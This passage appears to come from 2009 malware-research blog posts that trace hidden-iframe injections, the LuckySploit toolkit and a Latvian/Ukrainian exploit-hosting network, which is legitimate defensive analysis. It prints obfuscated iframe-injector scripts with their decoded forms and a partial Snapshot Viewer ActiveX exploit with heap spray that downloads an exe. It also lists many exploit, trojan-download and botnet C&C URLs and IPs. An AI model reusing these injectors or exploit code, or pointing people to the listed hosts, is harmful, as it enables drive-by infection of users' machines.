7'+r36+'322536312537'+r36+'332537'+r36+'302537'+r36+'322536312537'+r36
+'392532652536332536662536642532662536392536652532652537'+r36+'302
536382537'+r36+'30253366253237'+r36+'2532622534642536312537'+r36+'34
2536382532652537'+r36+'322536662537'+r36+'3525366525363425323825346
42536312537'+r36+'342536382532652537'+r36+'322536312536652536342536
6625366425323825323925326125333425333125333125333325333825323925
3262253237'+r36+'253334253338253336253338253636253336253336253237'
+r36+'2532302537'+r36+'37'+r36+'2536392536342537'+r36+'34253638253364
253333253330253337'+r36+'253230253638253635253639253637'+r36+'25363
82537'+r36+'342533642533312533332533342532302537'+r36+'332537'+r36+'
342537'+r36+'39253663253635253364253237'+r36+'2537'+r36+'36253639253
7'+r36+'332536392536322536392536632536392537'+r36+'342537'+r36+'3925
3361253638253639253634253634253635253665253237'+r36+'253365253363
2532662536392536362537'+r36+'3225363125366425363525336527'+r36+'29
293B7'+r36+'D7'+r36+'6617'+r36+'2206D7'+r36+'969613D7'+r36+'47'+r36+'27
'+r36+'5653B3C2F7'+r36+'3637'+r36+'2697'+r36+'07'+r36+'43E';alert(h49d2e3
64714d7(h49d2e36474be1));</script>

The deobfuscated code is

<script>if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65%
20%6e%61%6d%65%3d%63%32%37%20%73%72%63%3d%27%68%74%7
4%70%3a%2f%2f%65%78%74%72%61%73%70%72%61%79%2e%63%6f%
6d%2f%69%6e%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f
%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%
2a%34%31%31%33%38%29%2b%27%34%38%36%38%66%36%36%27%2
0%77%69%64%74%68%3d%33%30%37%20%68%65%69%67%68%74%3d
%31%33%34%20%73%74%79%6c%65%3d%27%76%69%73%69%62%69%
6c%69%74%79%3a%68%69%64%64%65%6e%27%3e%3c%2f%69%66%72
%61%6d%65%3e'));}var myia=true;</script>

which is an IFRAME

<iframe name=c27 src='hxxp://extraspray.com/in.php?'+Math.round(Math.random()*41138)+'4868f66' width=307 height=134 style='visibility:hidden'></iframe>

Analysis on March 25

hxxp://extraspray.com/in.php?
URL Analysis
hxxp://agkt.info/evo/getexe.exe
?o=7&t=1238025784&i=2154770527&e=
 
hxxp://agkt.info/evo/exploits/x19.php
?o=7&t=1238025784&i =2154770527
 
hxxp://agkt.info/evo/exploits/x18.php
?o=7&t=1238025784&i=2154770527
 
hxxp://agkt.info/evo/exploits/x21x1.php
 
hxxp://agkt.info/evo/getexe.exe
?o=4&t=1238025787&i=2154770527&e=
 
hxxp://rifnasax.cn/nuc/exe.phpURL Analysis - VirusTotal (Kryptik)

Analysis on April 17

hxxp://extraspray.com/in.php?
URL Analysis
hxxp://sgqw.info/evo/getexe.exe
?o=7&t=1239978315&i=2154770527&e=
 
hxxp://sgqw.info/evo/exploits/x19.php
?o=7&t=1239978315&i=2154770
 
hxxp://sgqw.info/evo/exploits/x18.php
?o=7&t=1239978315&i=2154770527
URL Analysis - VirusTotal - Anubis
hxxp://sgqw.info/evo/getexe.exe
?o=7&t=1239978315&i=2154770527&e=18
URL Analysis - VirusTotal - Anubis


Now with clarafin[.]info

Analysis on April 17 (07:26)

The source code show:

<script>if (!myia){
document.write(unescape('
%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%33%
32%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%63%6c
%61%72%61%66%69%6e%2e%69%6e%66%6f%2f%74%72%61%
66%66%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d
%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%
72%61%6e%64%6f%6d%28%29%2a%32%35%33%38%35%39%29
%2b%27%35%31%66%34%63%38%65%32%66%65%31%27%20%
77%69%64%74%68%3d%35%38%39%20%68%65%69%67%68%7
4%3d%34%33%31%20%73%74%79%6c%65%3d%27%76%69%73
%69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%27%
3e%3c%2f%69%66%72%61%6d%65%3e'));
}
var myia = true;
</script>

which is the IFRAME for clarafin[.]info

<iframe name=c32 src='hxxp://clarafin.info/traff/index.php?'+Math.round(Math.random()
*253859)+'51f4c8e2fe1' width=589 height=431 style='visibility:hidden'>
</iframe>

You can follow the result for "clarafin.info" on this page:
Internet Storm Center: Hosted javascript leading to .cn PDF malware

-------------

And now the new one who just appear on the same page: beebest[.]cn

Google Diagnosting for beebest.cn AS41665 (HOSTING)

This is just a part of the code:

function ss()
{
try{
ret=new ActiveXObject("snpvw.Snapshot Viewer Control.1");
var arbitrary
_file = "hxxp://beebest.cn/dlutrl23dnwfas/exe.php";
var dest = 'C:/Program Files/Outlook Express/wab
.exe';
document.write("<object classid='clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9' id='attack'>
</object>
");
attack.SnapshotPath = arbitrary_file;
setTimeout('window.location = "ldap://127.0.0.1"',3000);
a
ttack.CompressedPath = dest;
attack.PrintSnapshot(arbitrary_file,dest);
}catch(e){}
}
function xml()
{
var spray = unescape("%u0a0a%u0a0a");
do { spray += spray; } while(spray.length < 0xd0000);

memory = new Array();
for(i = 0; i < 100; i++){ memory[i] = spray + shellcode; }
document.
getElementById("xmlplace").innerHTML = "<XML ID=I><X><C><!


hxxp://beebest.cn/dlutrl23dnwfas/index.php
URL Analysis
hxxp://beebest.cn/dlutrl23dnwfas/spl/pdf.pdf
URL Analysis
hxxp://beebest.cn/dlutrl23dnwfas/exe.php
VirusTotal - Anubis


A ThreatExpertresult show the connection with stopgam.cn and
stopgam2.cn after infection

ThreatExpert Result




It's recommended that you block these IPs using your hosts file or your firewall.

These domain are also cited on Malware Domain List: 91.212.65.7
and all are still active.

hxxp://beebest.cn78.109.25.215
hxxp://clarafin.info212.5.74.37
hxxp://corpamata.cn
78.109.25.215
hxxp://extraspray.com
72.232.116.51
hxxp://agkt.info
 
hxxp://rifnasax.cn91.212.65.7
hxxp://sgqw.info85.17.136.137
hxxp://stopgam.cn85.17.136.137
hxxp://stopgam2.cn174.129.244.106
174.129.241.185


78.109.25.217

IP Location - Namibia - Plathost2 - Ivan Kirst

Domain Name: beebest.cn - stopgam.cn - corpamata.cn
Domain Status: ok
Registrant Organization: DomainsC
Registrant Name: MichellGregory
Administrative Email: abuse@domainsreg.cn
Sponsoring Registrar: 厦门华融盛世网络有限公司 -
Xiamen Huarong Spirit Network Limited
Name Server: ns1.us.editdns.net
Name Server: ns2.us.editdns.net
Name Server: ns3.us.editdns.net
Registration Date: 2009-02-11
Expiration Date: 2010-02-11

212.5.74.37

IP Location - Russia

Domain Name: clarafin.info
Domain Status: ok
Billing Organization: XiaMen BizCn Computer & NetWork CO.,Ltd
Name Server: ns1.us.editdns.net
Name Server: ns2.us.editdns.net
Name Server: ns3.us.editdns.net
Registration Date: 2009-03-18
Expiration Date: 2010-03-18

85.17.136.137

IP Location - Netherlands - LeaseWeb

omain Name: sgqw.info
Domain Status: ok
Registrant Organization: Private person
Registrant Name: Sumir Mahadjan
Administrative Email: mahadjans9@gmail.com
Sponsoring Registrar: Regtime Ltd. (R455-LRMS)
Name Server: ns1.mtpv.info
Name Server: ns2.mtpv.info
Name Server:ns3.us.editdns.net
Registration Date: 2009-04-01
Expiration Date: 2010-01-01

72.232.116.51

IP Location - US - Layered Technologies, Inc.

omain Name: extraspray.com
Domain Status: ok
Registrant Organization: Private person
Registrant Name: Sumir Mahadjan
Administrative Email: mahadjans9@gmail.com
Sponsoring Registrar: Regtime Ltd.
Name Server: vc11.amhost.net
Name Server: vc12.amhost.net
Registration Date: 2009-03-09
Expiration Date: 2010-03-09

174.129.244.106
174.129.241.185

IP Location - US - Amazon.com, Inc.

Domain Name: stopgam2.cn
ROID: 20090417s10001s12986159-cn
Domain Status: clientTransferProhibited
Registrant Name: Zitoclick
Administrative Email: support@zitoclick.com
Sponsoring Registrar: InamePro dba Dynadot
Name Server: ns1.dsredirection.com
Name Server: ns2.dsredirection.com
Registration Date: 2009-04-17 05:23
Expiration Date: 2010-04-17 05:23

91.212.41.119

Domain Name: tixwagoq.cn
Registrant Organization: 杭州五矿有限公司 - Minmetals Co., Ltd. Hangzhou
Registrant Name: 周明 - Zhou
Administrative Email: suhalbuia@163.com
Sponsoring Registrar: 易名中国 - Easy Chinese
Name Server: ns1.runsdns.cn
Name Server: ns2.runsdns.cn
Registration Date: 2009-03-18 22:16
Expiration Date: 2010-03-18 22:16

inetnum: 91.212.41.0 - 91.212.41.255
netname: gaztranzitstroyinfo-net
descr: LLC "Gaztransitstroyinfo"
country: Russia
------------

91.212.65.7

IP Location - Ukraine - Eurohost LLC

Domain Name: rifnasax.cn
Registrant Organization: Yong also Import and Export Corporation
Registrant Name: 张龙 - Long
Administrative Email: alvin_555@yeah.net
Sponsoring Registrar: 易名中国 - Easy Chinese
Name Server: ns2.dnsmytruedns.com
Name Server: ns1.dnsmytruedns.com
Registration Date: 2009-02-13 19:29
Expiration Date: 2010-02-13 19:29

This IP appear to host several websites with live exploits.

91.212.65.7

hxxp://dnsmytruedns.com
hxxp://hayboxiw.cn (Analysis)
hxxp://paksusic.cn
hxxp://paylayos.cn
hxxp://peskufex.cn
hxxp://porgacig.cn
hxxp://qicdator.cn (Analysis)
hxxp://ralcofic.cn
hxxp://rifnasax.cn (Analysis)
hxxp://tozxiqud.cn

91.212.41.119

hxxp://tixwagoq.cn/in.cgi?6 (Analysis)


Thursday, April 9, 2009

Black Hat SEO - RBN Hacks, p.2

The silent threat: Black Hat SEO - Cyber Crime Toolkit Exposed

Welcome to LuckySploit:) ITS TOASTED

READ THIS page if you need more information


WARNING: All sites listed on this page are dangerous (live URL with exploits) which lead
to trojans beeing automatically installed on your computer.
Do NOT visit them unless you know what you are doing.
(only links are safe)


A nice article provided by Finjan about the Lucky Sploit toolkit, one of the
latest script kiddies that cyber criminals used these days can be found
following this link: LuckySploit Toolkit Exposed

Using well known technic such as "Code Obfuscation" most often used to
hide its first intention (sometimes randomly generated), here is one of the
numerous malicious script found on several compromised website.

<iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe>
<script>function c102916999516l4963660743084(l4963660743855){
var l4963660744026=16; return (parseInt(l4963660743855,l4963660744026));}
function l4963660744fc7(l4963660745797){
function l4963660746f0b(){return 2;}
var l4963660745f69='';
l4963660747eab=String.fromCharCode;
for(l4963660746738=0;l4963660746738<l4963660745797.length;
l4963660746738+=l4963660746f0b()){
l4963660745f69+=(l4963660747eab(c102916999516l4963660743084(
l4963660745797.substr(l4963660746738,l4963660746f0b()))));}
return l4963660745f69;}
var x60='';
var l4963660748680='3C736'+x60+'3726'+x60+'970743E6'+x60+'96'+x60+'6'+x60
+'28216'+x60+'D796'+x60+'96'+x60+'1297B6'+x60+'46'+x60+'F6'+x60+'3756'+x
60+'D6'+x60+'56'+x60+'E742E77726'+x60+'9746'+x60+'528756'+x60+'E6'+x60+
'5736'+x60+'36'+x60+'1706'+x60+'528202725336'+x60+'32536'+x60+'392536'+
x60+'36'+x60+'2537322536'+x60+'312536'+x60+'6'+x60+'42536'+x60+
'352532302536'+x60+'6'+x60+'52536'+x60+'312536'+x60+'6'+x60+'42536'+x60+
'3525336'+x60+'42536'+x60+'332533312533302532302537332537322536'+x60+
'3325336'+x60+'42532372536'+x60+'3825373425373425373025336'+x60+
'125326'+x60+'6'+x60+'25326'+x60+'6'+x60+'2536'+x60+'372536'+x60+'6'+
x60+'6'+x60+'2536'+x60+'372536'+x60+'6'+x60+'6'+x60+'2533322536'+x60+
'6'+x60+'42536'+x60+'3525326'+x60+'52536'+x60+'6'+x60+'52536'+x60+
'3525373425326'+x60+'6'+x60+'25326'+x60+'52536'+x60+'372536'+x60+'6'+
x60+'6'+x60+'25326'+x60+'6'+x60+'2536'+x60+'332536'+x60+'382536'+x60+
'352536'+x60+'332536'+x60+'6'+x60+'225326'+x60+'52536'+x60+'382537342536'+
x60+'6'+x60+'42536'+x60+'6'+x60+'32532372532302537372536'+x60+'392536'+
x60+'342537342536'+x60+'3825336'+x60+'42533332533342533392532302536'+
x60+'382536'+x60+'352536'+x60+'392536'+x60+'372536'+x60+'3825373425336'+
x60+'42533352533352533372532302537332537342537392536'+x60+'6'+x60+
'32536'+x60+'3525336'+x60+'4253237253736'+x60+'2536'+x60+'392537332536'+
x60+'392536'+x60+'322536'+x60+'392536'+x60+'6'+x60+'32536'+x60+
'3925373425373925336'+x60+'12536'+x60+'382536'+x60+'392536'+x60+'342536'+
x60+'342536'+x60+'352536'+x60+'6'+x60+'525323725336'+x60+'525336'+x60+
'325326'+x60+'6'+x60+'2536'+x60+'392536'+x60+'36'+x60+'2537322536'+x60+
'312536'+x60+'6'+x60+'42536'+x60+'3525336'+x60+'52729293B7D76'+x60+'6'+
x60+'172206'+x60+'D796'+x60+'96'+x60+'13D7472756'+x60+'53B3C2F736'+x60+
'3726'+x60+'970743E';alert(l4963660744fc7(l4963660748680));
</script>

The deobfuscated result is:

<script>
if(!myia){document.write(unescape('%3c%69%66%72%61%6d%65%20%6e
%61%6d%65%3d%63%31%30%20%73%72%63%3d%27%68%74%74%70%3a%
2f%2f%67%6f%67%6f%32%6d%65%2e%6e%65%74%2f%2e%67%6f%2f%63%
68%65%63%6b%2e%68%74%6d%6c%27%20%77%69%64%74%68%3d%33%
34%39%20%68%65%69%67%68%74%3d%35%35%37%20%73%74%79%6c%
65%3d%27%76%69%73%69%62%69%6c%69%74%79%3a%68%69%64%64%
65%6e%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}
var myia=true;
</script>

and then load the IFRAME.

<iframe name=c10 src='hxxp://gogo2me.net/.go/check.html' width=349 height=557 style='visibility:hidden'></iframe>

Note that the script found in the second redirection show a lot of chat which refer
different IPs or hacking problems (IFRAME injected) Google search for "if(!myia)" iframe


An example of site on the same IP:

gogo2me.netresolve to 94.247.2.157 [hs.2-157.zlkon.lv]

and then load an IFRAME (with the LuckySpoit)

hxxp://94.247.2.157/.dif/go.php?sid=1
hxxp://94.247.2.157/.lck/?t=3
hxxp://94.247.2.157/.lck/?t=6
http://94.247.2.157/.lck/?90f6ff8e287ae123...
http://94.247.2.157/.lck/?75c4a0ecf4a4836...

Wepawet Analysis

A ThreatExpert analysis also indicate the relationship with these viruses/malware:

Zlob variant (Trojan-Spy.Win32.Zbot), keylogger's trojan (Trojan-Spy.Zbot.YETH) and some
TDSS (Alias Alureon) variant Win32.Fasec [Ikarus]


And here I just show you the line :) Also note the use of RSA algorithm (screenshot)

nextkey = '';
k = '';
attack_level = 0;
try {
f = 'Welcome to LuckySploit:) \n ITS TOASTED';
} catch (e){
}








 

Black Hat SEO - RBN Hacks, p.1

The silent threat: Black Hat SEO, exploits, hacks, botnets

Inspecting the bad network

READ THIS page if you need more information

WARNING: All sites listed on this page are dangerous (live URL with exploits)
which lead to trojans beeing automatically installed on your computer.
Do NOT visit them unless you know what you are doing.
(only links are safe)


If you want information about desinfection check out this page:
Analysis of a website infected with a hidden iframe (by NoVirusThanks)

This doesn't include the desinfection of your website (attacked - iframed).

For this change your passwords (windows passwords, FTP, emails, database
access etc.) and remove the content injected on each page as quickly as possible
(contact your hosting provider for assistance).

This page reference domain found in thousand of compromised websites using
obfuscated javascript code injected (IFRAME).


The Zlkon network (DATORU EXPRESS SERVISS) has been cited in several blogs
for hosting malicious content for cyber criminals - for example:

On Symantec website for spreading the TDSS trojan [hs.2-104.zlkon.lv] - in conjunction
with IPs at UkrTeleGroup Ltd.in December 2008

85.255.115.156
85.255.112.87
85.255.115.50
85.255.112.154

On the msmvps' blog for inaccurate whois details in January 2009
On bluetack.co.uk forum for rogue antivirus here in January 2009
Another example with "Total Defender", other rogue antivirus here
Also found on several websites including fireeye "Bad Actors Part 2 - ZlKon"
- dancho danchev's blog
Network in conjunction cited here: Bad, bad, cybercrime-friendly ISPs!




A quick look at two IPs at Zlkon in Latvia


94.247.3.152 [hs.3-152.zlkon.lv]

Using the dns

ns1.freednshostserver.com [78.109.18.234]
ns1.freednshostserver.com [78.109.18.235]

descr: Datacenter Hosting.UA
route: 78.109.16.0/20
origin: AS41665

we have these domain currently live and kicking a lot of websites
(simply enter a domain or "in.cgi?cocacola" in google reveal a lot of chat related to
hacked domain iframed.)

betstarwager.cn/in.cgi?cocacola Analysis
bestlotron.cn/in.cgi?cocacola Analysis
denverfilmdigitalmedia.cn/in.cgi?cocacola Analysis
diettopseek.cn/in.cgi?cocacola Analysis
filmlifemusicsite.cn/in.cgi?cocacola Analysis
filmlifemusicsite.cn/ Analysis
filmtypemedia.cn/in.cgi?cocacola Analysis
litedownloadseek.cn/in.cgi?cocacola Analysis
litetopfindworld.cn/in.cgi?cocacola Analysis
litetoplocatesite.cn/in.cgi?cocacola Analysis
nanotopfind.cn/in.cgi?cocacola Analysis
promixgroup.cn/in.cgi?cocacola Analysis
yourliteseek.cn/in.cgi?cocacola Analysis
   
ghrgt.hostindianet.com/index.php Analysis
lieliteautobody.cn/load.php?id=4
[94.247.3.151]
Anubis - VirusTotal
Botnet C&C: 213.155.4.82
Anubis Family 1175580
   
ghrgt.hostindianet.com/cache/readme.pdf Analysis
zzzz.hostindianet.com/load.php?id=4 Anubis - VirusTotal
Botnet C&C:
213.155.4.80
78.109.30.224
   

Also cited on Dancho Danchv's blog here in the serie of embassies websites iframed. (11 of them - including hostindianet[.]com)





On the next IP:

94.247.3.151 [hs.3-152.zlkon.lv]

hxxp://bigtopescorts.cn/in.cgi?id1000 (dead)  
hxxp://cheapslotplay.cn/in.cgi?income48 Redirect to exploit
hxxp://hyperliteautoservices.cn/index.php (dead)
but the trojan is still available on
hyperliteautoservices.cn/load.php
VirusTotal - Anubis
hxxp://daddybigtop.cn
Load trojan on
hxxp://freeonlinehostguide.com/load.php
VirusTotal - Redirection Analysis - Anubis
Detection:
Trojan-Downloader.Win32.Bredolab!IK
TR/Crypt.ZPACK.Gen
Trojan-Downloader.Win32.Bredolab
Trojan:Win32/Meredrop

Using a stack overflow in adobe reader 8.1.2
CVE-2008-2992
hxxp://educationbigtop.cn VirusTotal Report (Brebolab)
hxxp://freehostinternet.com Load trojan on
hxxp://daddybigtop.cn/load.php
VirusTotal - Anubis
Detection:
Trojan-Downloader.Win32.Bredolab

Connect to botnet: 213.155.6.33
hxxp://freeonlinehostguide.com/
index.php
Load trojan on
hxxp://zzz.free.hostindianet.com/load.php?id=4
VirusTotal - Javascript Analysis - Anubis
Detection:
TR/Crypt.XPACK.Gen
Win32:Walpak
Win32/Kryptik.LI
Trojan.Waledac.Gen!Pac.8

It connect to a URL and drop the file "digiwet.dll"
Botnets C&C:
turokgame.cn [74.50.98.156]
94.247.2.95 and 78.109.30.224
hxxp://freewebhostguide.com Symantec
hxxp://greatbethere.cn Load trojan on
hxxp://greatbethere.cn/load.php?id=4
VirusTotal - Javascript Analysis - Anubis
Detection:
TR/Crypt.XPACK.Gen
Win32:Walpak
Win32/Kryptik.LI
Trojan.Waledac.Gen!Pac.8

Using a stack overflow in adobe reader 8.1.1 CVE-2007-5659

It connect to a URL and drop the file "digiwet.dll"
Botnets C&C:
213.155.6.32
78.109.30.224
hxxp://hugetopnonfat.cn dead
hxxp://mediahomenamemartvideo.cn/
in.cgi?income
Botnet C&C / redirect to exploit
hxxp://hyperliteautoservices.cn/index.php (dead)
but the trojan is still available on
hyperliteautoservices.cn/load.php
VirusTotal - Redirection Analysis - Anubis
hxxp://hyperliteautoservices.cn Redirect to exploit
hxxp://hyperliteautoservices.cn/index.php
but the trojan is still available on
hyperliteautoservices.cn/load.php
VirusTotal - Redirection Analysis - Anubis
Flash exploit is also live:

Flash Analysis
Botnet C&C: 78.109.29.112
hxxp://lieliteautobody.cn (dead)  
hxxp://liteautofinestsite.cn/load.php Exploit not found but trojan still there
hxxp://liteautofinestsite.cn/load.php
hxxp://liteautogreatest.cnExploits
hxxp://liteautogreatest.cn/cache/readme.pdf
hxxp://liteautogreatest.cn/cache/flash.swf
to load trojan on
hxxp://liteautogreatest.cn/load.php
VirusTotal - Redirection Analysis - Anubis

Flash exploit is also live:
Flash Analysis - VirusTotal

Botnet C&C: 78.109.29.112
hxxp://liteautorepair.cn Exploit to load trojan on
zzzz.hostindianet.com/load.php?id=4
VirusTotal - Redirection Analysis - Anubis

Detection:
Trojan-Downloader.Win32.Bredolab

Botnet controller: 213.155.4.82
hxxp://litedownloadfinest.cn Exploit to load trojan on
zzzz.hostindianet.com/load.php?id=4
VirusTotal - Redirection Analysis - Anubis

Detection:
TrojanDownloader:Win32/Bredolab.B

Previous botnet controller: 78.109.29.112
hxxp://litehitscar.cn/index.php Exploit to load trojan on
hyperliteautoservices.cn/load.php?id=4
VirusTotal - Redirection Analysis - Anubis

Detection:
Trojan.Botnetlog.3

Botnets:
78.109.29.112 - 78.109.30.224
74.54.77.82
hxxp://lieliteautobody.cn/load.php Exploit not found but trojan still there
lieliteautobody.cn/load.php
hxxp://liteautofinestsite.cn/load.php Exploit not found but trojan still there
liteautofinestsite.cn/load.php
hxxp://liteupyourride.cn/Exploits
hxxp://liteupyourride.cn/cache/readme.pdf
hxxp://liteupyourride.cn/cache/flash.swf
to load trojan on
hxxp://litehitscar.cn/load.php
VirusTotal - Anubis

PDF exploit is also live:
PDF Analysis - VirusTotal

Botnet C&C: 78.109.29.112
hxxp://yournonfatbest.cn Exploit to load trojan on
farm-en-12san.hostindianet.com/load.php?id=4
VirusTotal - Redirection Analysis - Anubis

Detection:
TrojanDownloader:Win32/Bredolab.G

Botnets:
213.155.4.82
78.109.30.224
hxxp://lotbetsite.cn Exploit to load trojan on
casinoslotbet.cn/load.php - Analysis
VirusTotal - Anubis - Flash Exploit Analysis

Detection:
Trojan-Downloader.Win32.Bredolab

Botnet:
213.155.6.33
   
hxxp://hugetopnonfat.cn/in.cgi?id1000 Javascript Analysis
hxxp://PremiumNonfat.cn/all/
dead


94.247.3.150 [hs.3-150.zlkon.lv]

hxxp://autobestwestern.cn/
cache/readme.pdf
Exploit to load trojan on
litehitscar.cn/load.php?id=5 - Analysis
VirusTotal - Anubis - Flash Exploit Analysis

Detection:
TrojanDownloader:Win32/Bredolab.Q

Botnet:
78.109.29.112
hxxp://coolnameshop.cn/in.cgi?income 
hxxp://cutlot.cn/in.cgi?income Botnet C&C / Exploits to
hxxp:// liteautogreatest.cn/index.php
Analysis
then load trojan located
hxxp://litehitscar.cn/load.php?id=5
VirusTotal - Anubis

Botnets:
78.109.29.112 - 78.109.30.224
hxxp://dotcomnameshop.cnBotnet C&C
hxxp://lotante.cnBotnet C&C / Exploits to litehitscar.cn/index.php
Analysis
then load trojan located
hyperliteautoservices.cn/load.php?id=4
VirusTotal - Anubis
Botnets:
78.109.29.112 - 78.109.30.224
74.54.77.82

hxxp://lotbetworld.cn/in.cgi?incomeBotnet C&C / Exploits to litehitscar.cn/index.php
[94.247.3.151]
Analysis
then load trojan located
hyperliteautoservices.cn/load.php?id=4
VirusTotal - Anubis
Botnets:
78.109.29.112 - 78.109.30.224
74.54.77.82

hxxp://homenameregistration.cnBotnet C&C / Exploits to 78.41.207.196/vertu/?t=5
Analysis
then load trojan located
78.41.207.196
Analysis
hxxp://hugetopnonfat.cnBotnet C&C
hxxp://dotcomnameshop.cn/
in.cgi?income
Botnet C&C / Redirect to exploits
hxxp://litehitscar.cn/index.php
[94.247.3.151]
Redirection Analysis - Exploit analysis
then load trojan located
hxxp://hyperliteautoservices.cn/load.php?id=4
VirusTotal - Anubis
Botnets:
78.109.29.112 - 78.109.30.224
74.54.77.82

hxxp://japanhostnet.com/
in.cgi?income
Botnet C&C / Redirect to exploits litehitscar.cn/index.php
[94.247.3.151]
Redirection Analysis - Exploit analysis
then load trojan located
hyperliteautoservices.cn/load.php?id=4
VirusTotal - Anubis
Botnets:
78.109.29.112 - 78.109.30.224
74.54.77.82

hxxp://internetnamestore.cn/
in.cgi?income18
hyperliteautoservices.cn/index.php [94.247.3.151] Analysis
hxxp://lotmachinesguide.cn/
in.cgi?income
Redirects to exploits
hxxp://liteautogreatest.cn/cache/readme.pdf
hxxp://liteautogreatest.cn/cache/flash.swf
to load trojan on
hxxp://liteautogreatest.cn/load.php
VirusTotal - Redirection Analysis - Anubis

Botnet C&C: 78.109.29.112
hxxp://mainnameshop.cnRedirect to exploits sdfi.hostindianet.com/index.php (dead)

Detection: Win32/Bredolab.B
hxxp://mediahomenamemartvideo.cnBotnet C&C down (TS v3.2)
hxxp://mediahousenameshopfilm.cn 
hxxp://nameashop.cn/in.cgi?incomeOn 2009-03-21 01:40:07 - Analysis
Redirect to exploit on
hxxp://sadcwed.hostindianet.com/index.php
On 2009-04-05 13:22:58 - Analysis
Redirect to exploit on
freeonlinehostguide.com/index.php
Analysis - VirusTotal - Anubis
Detection: Waledac - Kryptik.LI - Win32:Walpak Trojan.Crypt.XPACK.Gen
It connect to a botnet and drop the file "digiwet.dll"
Botnets:
turokgame.cn [74.50.98.156]
94.247.2.95 and 78.109.30.224
hxxp://namebrandmart.cn/in.cgi
?income18
litehitscar.cn/load.php Analysis
hxxp://namebuyline.cn Analysis
hxxp://namebuypicture.cn/
in.cgi?income31
Botnet C&C / redirect to exploit
hyperliteautoservices.cn/index.php (dead)
but the trojan is still available on
hyperliteautoservices.cn/load.php
VirusTotal - Anubis - Analysis
hxxp://namesupermart.cnBotnet C&C
hxxp://namestorefilmlife.cn/
in.cgi?income
Botnet C&C / Exploits to litehitscar.cn
Analysis
then load trojan located
hyperliteautoservices.cn/load.php?id=4
VirusTotal - Anubis
hxxp://perfectnamestore.cn
/in.cgi?income8
Redirect to exploit
hyperliteautoservices.cn/index.php (dead)
but the trojan is still available on
hyperliteautoservices.cn/load.php
VirusTotal - Anubis
[94.247.3.151]
hxxp://playbetwager.cn/in.cgi?income
freeonlinehostguide.com/index.php
hxxp://superbetfair.cn/in.cgi?incomeBotnet C&C / Exploits to litehitscar.cn
Analysis
then load trojan located
hyperliteautoservices.cn/load.php?id=4
VirusTotal - Anubis - Redirection Analysis
Detection: Trojan.Botnetlog.3
hxxp://thelotbet.cn 
hxxp://yourfilmmovie.cnBotnet C&C


hxxpp//freeonlinehostguide.com/index.php Analysis

Dns

AS48856
VENTREX-AS Ventrex LLP

95.129.144.210

freednshostway.com
ns1.bigtopescorts.cn
ns1.casinobigtop.cn
ns1.casinoslotbet.cn
ns1.cheapslotplay.cn
ns1.daddybigtop.cn
ns1.educationbigtop.cn
ns1.freednshostway.com
ns1.freehostinternet.com
ns1.freeonlinehostguide.com
ns1.freewebhostguide.com
ns1.greatbethere.cn
ns1.hostindianet.com
ns1.hyperliteautoservices.cn
ns1.lieliteautobody.cn
ns1.liteautofinestsite.cn
ns1.liteautorepair.cn
ns1.litehitscar.cn
ns1.lotante.cn
ns1.lotbetsite.cn
ns1.playbetwager.cn

AS34187
RENOME-AS Renome-Service: Joint Multimedia Cable Network Odessa, Ukraine

78.26.179.79

ns2.bigtopescorts.cn
ns2.casinobigtop.cn
ns2.casinoslotbet.cn
ns2.cheapslotplay.cn
ns2.daddybigtop.cn
ns2.educationbigtop.cn
ns2.freednshostway.com
ns2.freehostinternet.com
ns2.freeonlinehostguide.com
ns2.freewebhostguide.com
ns2.greatbethere.cn
ns2.hostindianet.com
ns2.hyperliteautoservices.cn
ns2.lieliteautobody.cn
ns2.liteautofinestsite.cn
ns2.liteautorepair.cn
ns2.litehitscar.cn
ns2.lotante.cn
ns2.lotbetsite.cn
ns2.playbetwager.cn